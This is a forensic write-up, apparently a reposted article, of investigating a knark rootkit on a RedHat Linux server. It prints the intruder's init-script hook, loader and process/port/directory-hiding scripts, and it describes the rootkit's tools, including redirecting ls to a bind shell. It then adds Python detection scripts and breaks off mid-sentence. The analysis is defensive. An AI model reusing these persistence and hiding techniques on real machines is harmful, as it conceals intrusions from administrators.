How to analyze an intruder on Linux

Source: Internet
Author: User
Tags: nfsd

Tianyang Network Technology Alliance
www.tian6.net
bbs.tian6.com


I. The incident
  
Time: PM
  
Location: a RedHat Linux machine:
  
# uname -a
Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown
  
Out of habit I went straight to /etc/rc.d/init.d, and one look at the listing showed the anomaly: every script there carries a 1999 date except network, which has been touched this year:
  
# ls -la
......
-rwxr-xr-x 1 root 2775 Mar 26 1999 netfs
-rwxr-xr-x 1 root 5537 Mar 3 network
-rwxr-xr-x 1 root 2408 Apr 16 1999 nfs
......
  
II. Preliminary check
  
Obviously a novice: the network script has been modified. Let's look at it with stat first:
  
# stat network
File: "network"
Size: 5537 Filetype: Regular File
Mode: (0755/-rwxr-xr-x) Uid: (0/root) Gid: (0/root)
Device: 3, 1 Inode: 269454 Links: 1
Access: Sun Mar 11 10:59:59 2001 (00000.05: 53: 41)
Modify: Sun Mar 4 05:23:41 2001 (00007.11: 29: 59)
Change: Sun Mar 4 05:23:41 2001 (00007.11: 29: 59)
  
The last modification was made in the early hours of March 4. Let's see what he added to the file:
  
# cat network
......
/usr/lib/libdd.so.1
  
So the attacker simply appended a line to the end of the script, which is not a very subtle technique. (On an RPM-based system, rpm -V initscripts would also have flagged the changed size and checksum of this file, provided rpm and its database can still be trusted.) First of all, what is this file?
  
# file /usr/lib/libdd.so.1
/usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
  
Oh, so despite the library-style name it is an executable, not a shared object. Let's run strings on it and see whether anything looks familiar:
  
# strings /usr/lib/libdd.so.1
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
system
__deregister_frame_info
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
/boot/.pty0/go.sh <-------- this string looks interesting.
  
That makes it simple: the binary imports system() and carries the path of a script. Let's look at that path:
  
# cd /boot/.pty0
# cat go.sh
#!/bin/bash
# only run if the hidden kit directory is still present
f=`ls -al /boot | grep .pty0`
if [ -n "$f" ]; then
cd /boot/.pty0
./mcd -q
cd mech1
./mech -f conf 1>/dev/null 2>/dev/null
cd ..
cd mech2
./mech -f conf 1>/dev/null 2>/dev/null
cd ..
cd mech3
./mech -f conf 1>/dev/null 2>/dev/null
cd ..

# load the kernel modules, then run the hiding script
/sbin/insmod paraport.o 1>/dev/null 2>/dev/null
/sbin/insmod iBCS.o 1>/dev/null 2>/dev/null
./ascunde.sh
fi
  
A bit dizzying. I have no idea yet what mcd and mech are for. Let's look at the other script it runs:
  
# cat ascunde.sh

#!/bin/bash
# hdm lists process names to hide: signal 31 marks them hidden
for proces in `/bin/cat /boot/.pty0/hdm`; do
p=`/sbin/pidof $proces`
if [ -n "$p" ]; then
killall -31 $proces 1>/dev/hdm 2>/dev/hdm
fi
done
# hdm1 lists ports to hide from /proc/net/tcp, converted to hex first
for port in `/bin/cat /boot/.pty0/hdm1`; do
./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm
done
# hdm2 lists directories to hide from listings
for director in `/bin/cat /boot/.pty0/hdm2`; do
./hidef $director 1>/dev/hdm 2>/dev/hdm
done
  
Here things start to get interesting; this is not the work of some third-rate script kiddie. I'll tar the whole kit up and pull it back for later analysis. Meanwhile, let's look at the directory it lives in:
  
# cd /boot
# ls -la
total 2265
drwxr-xr-x 3 root 1024 Mar 11 .
drwxr-xr-x 21 root 1024 Mar 2 ..
lrwxrwxrwx 1 root 19 Sep 26 1999 System.map -> System.map-2.2.5-15
-rw-r--r-- 1 root 186704 Apr 20 1999 System.map-2.2.5-15
-rw-r--r-- 1 root 512 Sep 26 1999 boot1_300
-rw-r--r-- 1 root 4544 Apr 13 1999 boot.b
-rw-r--r-- 1 root 612 Apr 13 1999 chain.b
-rw------- 1 root 9728 Sep 26 1999 map
lrwxrwxrwx 1 root 20 Sep 26 1999 module-info -> module-info-2.2.5-15
-rw-r--r-- 1 root 11773 Apr 20 1999 module-info-2.2.5-15
-rw-r--r-- 1 root 620 Apr 13 1999 os2_d.b
-rwxr-xr-x 1 root 1469282 Apr 20 1999 vmlinux-2.2.5-15
lrwxrwxrwx 1 root 16 Sep 26 1999 vmlinuz -> vmlinuz-2.2.5-15
-rw-r--r-- 1 root 617288 Apr 20 1999 vmlinuz-2.2.5-15
  
Sorry, things get more interesting still ...... the .pty0 directory does not show up at all. Note, though, that /boot still has a link count of 3: on ext2 a directory's link count is 2 plus the number of its subdirectories, so the kernel admits to one subdirectory even though the listing shows none.
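That link-count discrepancy is general enough to script. The following is an added example of mine, not code from the page or from knark: it compares a directory's st_nlink against the subdirectories a normal listing returns, on the assumption that the filesystem keeps the classic 2 + N link count (true for ext2/3/4, tmpfs and most traditional Unix filesystems; the default target list is also my choice).

```python
import os
import sys

# Added example, not from the page or from knark. On ext2/3/4 and most classic
# Unix filesystems a directory's link count is 2 + (number of subdirectories),
# because every child's ".." entry links back to the parent. A rootkit that
# filters readdir()/getdents() results, as knark's hidef does, removes the
# entry from listings but does not rewrite the parent inode, so the link count
# still counts the hidden child. Comparing the two exposes it.
# Caveats (assumptions of this check, not facts from the page): btrfs and some
# network/FUSE filesystems report st_nlink == 1 for every directory, so the
# check is skipped there; a child that is a mount point is still counted.


def expected_subdirs(nlink):
    """Subdirectories implied by the link count, or None where the 2 + N
    convention does not hold (nlink < 2)."""
    return nlink - 2 if nlink >= 2 else None


def visible_subdirs(path):
    """Subdirectory names a normal listing shows. Symlinks to directories are
    skipped: they carry no '..' entry and do not add to the parent's count."""
    with os.scandir(path) as it:
        return sorted(e.name for e in it if e.is_dir(follow_symlinks=False))


def hidden_subdir_count(nlink, visible):
    """Pure core of the check: how many subdirectories the link count claims
    but the listing omits. 0 is consistent, >0 is suspicious, None means the
    filesystem does not support the check."""
    expected = expected_subdirs(nlink)
    if expected is None:
        return None
    return expected - len(visible)


def check_directory(path):
    """Run the check on a live directory; returns (nlink, visible, hidden)."""
    nlink = os.lstat(path).st_nlink
    visible = visible_subdirs(path)
    return nlink, visible, hidden_subdir_count(nlink, visible)


if __name__ == "__main__":
    # Default targets are the places kits are usually parked; /boot is where
    # this page's intruder put .pty0.
    targets = sys.argv[1:] or ["/boot", "/dev", "/lib", "/usr/lib", "/tmp", "/var/tmp"]
    for d in targets:
        if not os.path.isdir(d):
            continue
        nlink, visible, hidden = check_directory(d)
        if hidden is None:
            print("%-10s nlink=%-4d link-count check not applicable" % (d, nlink))
        elif hidden > 0:
            print("%-10s nlink=%-4d visible=%-3d HIDDEN=%d" % (d, nlink, len(visible), hidden))
        else:
            print("%-10s nlink=%-4d visible=%-3d ok" % (d, nlink, len(visible)))
```

Run it as root so every target is readable. A non-zero HIDDEN count is a lead, not a verdict: the check is only as honest as the kernel answering lstat(), so confirm it from a trusted view (a clean boot medium, or the disk mounted elsewhere). With the /boot listing above it would report nlink=3, visible=0, HIDDEN=1.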
  
# cd .pty0
# ls -laF
total 1228
drwxr-xr-x 3 root 1024 Mar 11 ./
-rwxr-xr-x 1 root 345 Mar 3 ascunde.sh*
-rwxr-xr-x 1 root 12760 Mar 3 21:23 dec2hex*
-rwxr-xr-x 1 root 13414 Mar 3 21:23 ered*
-rwxr-xr-x 1 root 358 Mar 7 :03 go.sh*
-rwxr-xr-x 1 root 3872 Mar 3 hidef*
-rw-r--r-- 1 root 956 Mar 3 21:23 iBCS.o
-rw-r--r-- 1 root 524107 Mar 7 m.tgz
-rwxr-xr-x 1 root 656111 Mar 3 mcd*
drwxr-xr-x 4 root 1024 Mar 7 mech1/
drwxr-xr-x 4 root 1024 Mar 9 mech2/
drwxr-xr-x 4 root 1024 Mar 9 mech3/
-rwxr-xr-x 1 root 12890 Mar 3 21:23 nethide*
-rw-r--r-- 1 root 10948 Mar 3 21:23 paraport.o
-rw-r--r-- 1 root 522 Mar 3 21:23 ssh_host_key
-rw------- 1 root 512 Mar 11 ssh_random_seed
-rw-r--r-- 1 root 677 Mar 3 21:23 sshd_config
  
It looks like an LKM has been loaded, which is troublesome:
  
# /sbin/lsmod
Module Size Used by
nfsd 150936 8 (autoclean)
lockd 30856 1 (autoclean) [nfsd]
sunrpc 52356 1 (autoclean) [nfsd lockd]
3c59x 18920 1 (autoclean)
  
Are these normal modules? The first three are RPC-related, so let's see which RPC services the box is offering:
  
# /usr/sbin/rpcinfo -p localhost
program vers proto port
100000 2 tcp 111 rpcbind
100024 1 tcp 664 status
100011 1 udp 673 rquotad
100005 3 tcp 695 mountd
100003 2 udp 2049 nfs
100021 3 tcp 1024 nlockmgr
  
No wonder it was compromised: the whole RPC stack is open (status, rquotad, mountd, nfs, nlockmgr). At least this explains why nfsd, lockd and sunrpc are loaded, so those three modules are accounted for.
  
Now the network card. 3c59x is the NIC driver module:
  
# /sbin/ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:380640 errors:3374 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:380640

eth0 Link encap:10Mbps Ethernet HWaddr

Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:71144611 errors:820101 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:436037129
Interrupt:10 Base address:0xe400
  
# dmesg | grep eth0
eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400, 00:10:5a:63:5b:05, IRQ 10
eth0: Setting promiscuous mode.
device eth0 entered promiscuous mode
  
So these modules all look normal, but there is one awkward line: "device eth0 entered promiscuous mode". It seems the intruder has started a sniffer. Note that the ifconfig flags above show no PROMISC on eth0 while dmesg records the device entering promiscuous mode, so either the sniffer has since stopped or the flag is being hidden from us. The real problem is that the intruder has loaded something we cannot see. A bit dizzying ...... All right, let's start from the file names ......
  
III. Module introduction
  
nethide? That rings a bell ...... I went digging through a pile of old exploit archives and eventually found an article on knark hacking that mentions nethide. I downloaded the kit to play with: the version is knark-0.59, written for Linux kernel 2.2. Fine ...... Let's first look at what this kernel module and its helper programs do:
  
Apart from taskhack.c, all of these tools only work once the knark.o module has been loaded.
  
hidef hides a file or directory. Create a directory, for example /boot/.pty0, then run ./hidef /boot/.pty0 and the directory is hidden; not even du can find it. Anything placed under that directory is hidden along with it.
  
ered redirects the execution of a program. For example, copy a bindsh*ll program to /boot/.pty0/bindsh*ll and run ./ered /bin/ls /boot/.pty0/bindsh*ll; from then on executing ls runs the bindsh*ll instead. The ls binary itself is untouched, it just no longer runs as expected. To clear all redirections, run ./ered -c. nethide hides connections in /proc/net/tcp and /proc/net/udp, which is where netstat gets its information. For example, to hide the connection information for port 43981 you must enter:
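The page breaks off here, but the two hiding mechanisms it has described, process hiding via signal 31 (ascunde.sh) and connection hiding via nethide, can both be cross-checked from userland. The following is an added example of mine, not code from the page or from knark. It assumes a Linux /proc layout and that the rootkit filters the /proc views but leaves kill() and bind() alone, which holds for knark-era LKMs and must be re-verified for anything newer; the /proc/net/tcp excerpt inside it is constructed, not captured from the compromised machine.

```python
import errno
import os
import socket

# Added example, not from the page or from knark. Two cross-checks for the
# hiding tricks described above: a rootkit that filters /proc usually leaves
# another kernel interface alone, so ask the kernel the same question two ways.
#  1. Hidden processes: /proc/<pid> is filtered, but kill(pid, 0) still
#     returns 0 or EPERM for a live pid and ESRCH for a dead one.
#  2. Hidden sockets: the /proc/net/tcp line is filtered (nethide matches the
#     hex ":ABCD" form of the port), but the port stays bound, so bind() on it
#     fails with EADDRINUSE.


def proc_pids():
    """PIDs visible through /proc, i.e. what ps would show."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def pid_is_alive(pid):
    """Ask via kill(pid, 0) instead of /proc."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def hidden_pids(visible, alive, recheck=None):
    """Pure comparison: pids alive per kill() but absent from /proc. recheck(pid)
    drops candidates that merely exited between the two scans (a race)."""
    candidates = sorted(set(alive) - set(visible))
    if recheck is None:
        return candidates
    return [p for p in candidates if recheck(p)]


def scan_hidden_pids():
    max_pid = 32768
    try:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    except OSError:
        pass
    alive = {p for p in range(1, max_pid + 1) if pid_is_alive(p)}
    still_hidden = lambda p: pid_is_alive(p) and not os.path.exists("/proc/%d" % p)
    return hidden_pids(proc_pids(), alive, recheck=still_hidden)


def local_ports(proc_net_tcp_text, states=None):
    """Parse /proc/net/tcp (or tcp6): column 2 is HEXIP:HEXPORT, column 4 the
    state (0A = LISTEN). Returns the local ports the kernel admits to."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and (states is None or fields[3] in states):
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports


def port_in_use(port):
    """True if bind() fails with EADDRINUSE, False if it succeeds, None if
    inconclusive (e.g. EACCES on a privileged port when not root)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind(("0.0.0.0", port))
        return False
    except OSError as e:
        return True if e.errno == errno.EADDRINUSE else None
    finally:
        s.close()


def hidden_listeners(visible_ports, probe, ports=range(1, 65536)):
    """Pure comparison: ports the probe says are bound but /proc does not show
    in any state (a local client's ephemeral port also collides on bind)."""
    return [p for p in ports if p not in visible_ports and probe(p) is True]


# Constructed /proc/net/tcp excerpt (not captured from the page's machine):
# sshd on 22, a listener on 43981 (0xABCD, the port named in the text) and
# one outbound connection from ephemeral port 0x8F2C.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 c0000000 300 0 0 2 -1
   1: 0100007F:ABCD 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 c0000000 300 0 0 2 -1
   2: 0A000001:8F2C 0A000002:0050 01 00000000:00000000 00:00000000 00000000  1000        0 9012 1 c0000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    print("hidden pids:", scan_hidden_pids())
    visible = set()
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):  # v6 listeners also block v4 bind()
        try:
            with open(path) as f:
                visible |= local_ports(f.read())
        except OSError:
            pass
    print("bound but absent from /proc/net/tcp*:", hidden_listeners(visible, port_in_use))
```

Run it as root so that privileged ports give a definite answer from bind(). UDP needs the same treatment with SOCK_DGRAM against /proc/net/udp, and on the sample data local_ports() returns {22, 43981, 36652}, so a bind() collision on 43981 while that line is missing from /proc/net/tcp is exactly what a nethide-hidden port looks like.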
